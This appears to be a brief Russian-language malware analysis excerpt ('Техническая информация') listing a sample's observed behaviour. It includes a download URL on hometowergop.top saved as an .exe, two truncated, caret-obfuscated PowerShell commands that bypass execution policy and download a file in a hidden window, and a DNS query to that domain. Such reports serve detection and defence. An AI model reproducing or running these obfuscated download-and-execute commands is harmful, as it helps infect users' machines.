Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWerSHeL^l.E^Xe -EX^E^c^u^T^iO^Np^O^LICY^ Bypass^ ^-N^oPRO^FiLe^ -^w^I^ndOwstyLE^ ^hI^dD^en^ ^(^N^Ew-^ObjECT ^S^ySTEm.^NEt.W^ebc^LIE^n^t).D^OWnl^OAd^fIl^E^('http://hometowerg...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "p^oWerSHeL^l.E^Xe -EX^E^c^u^T^iO^Np^O^LICY^ Bypass^ ^-N^oPRO^FiLe^ -^w^I^ndOwstyLE^ ^hI^dD^en^ ^(^N^Ew-^ObjECT ^S^ySTEm.^NEt.W^ebc^LIE^n^t).D^OWnl^OAd^fIl^E^('http://hometowerg...' (со скрытым окном)